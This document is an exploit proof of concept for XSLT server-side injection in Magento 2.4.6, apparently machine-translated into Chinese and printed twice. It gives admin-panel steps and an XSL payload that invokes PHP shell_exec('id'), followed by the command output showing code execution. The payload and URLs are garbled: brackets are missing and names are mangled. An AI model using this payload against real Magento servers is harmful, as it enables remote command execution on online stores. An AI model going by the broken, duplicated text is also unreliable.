#利用标题: Magento Ver。 2.4.6- XSLT服务器侧注射
日期: ** 2023-11-17
漏洞作者: ** tmrswrr
供应商homepage: ** [https://magento2demo.firebearstudio.com/](3https://magento2demo.firebearstudio.com/)
软件link: ** [Magento 2.4.6-P3](https://github.com/magento/magento/magento2/archive/refs/refs/tags/2.4.6-p3.zip)
版本: ** 2.4.6
在: ** 2.4.6测试
## POC
1。输入此URL:的管理凭据[https://magento2demo.firebearstudio.com/](3https://magento2demo.firebearstudio.com/)
2。单击`系统导入作业实体类型窗口小部件单击编辑
3。选择导入源是文件
4。单击“ XSLT配置”,然后编写此PAYLOAD:
``'xml
?xml版本='1.0'encoding='utf-8'?
XSL:StylesHeet版本='1.0'
XMLNS:XSL='http://www.w3.org/1999/xsl/transform'
xmlns
hp='http://php.net/xsl'
XSL3:Template Match='/'
XSL:VALUE-of SELECT='PHP:FUNCON('shell_exec','id')' /
/XSL:Template
/xsl:stylesheet```
##结果
**?xml版本='1.0'?
** UID=10095(A0563AF8)GID=1050(A0563AF8)组=1050(A0563AF8)
日期: ** 2023-11-17
漏洞作者: ** tmrswrr
供应商homepage: ** [https://magento2demo.firebearstudio.com/](3https://magento2demo.firebearstudio.com/)
软件link: ** [Magento 2.4.6-P3](https://github.com/magento/magento/magento2/archive/refs/refs/tags/2.4.6-p3.zip)
版本: ** 2.4.6
在: ** 2.4.6测试
## POC
1。输入此URL:的管理凭据[https://magento2demo.firebearstudio.com/](3https://magento2demo.firebearstudio.com/)
2。单击`系统导入作业实体类型窗口小部件单击编辑
3。选择导入源是文件
4。单击“ XSLT配置”,然后编写此PAYLOAD:
``'xml
?xml版本='1.0'encoding='utf-8'?
XSL:StylesHeet版本='1.0'
XMLNS:XSL='http://www.w3.org/1999/xsl/transform'
xmlns
hp='http://php.net/xsl'XSL3:Template Match='/'
XSL:VALUE-of SELECT='PHP:FUNCON('shell_exec','id')' /
/XSL:Template
/xsl:stylesheet```
##结果
**?xml版本='1.0'?
** UID=10095(A0563AF8)GID=1050(A0563AF8)组=1050(A0563AF8)
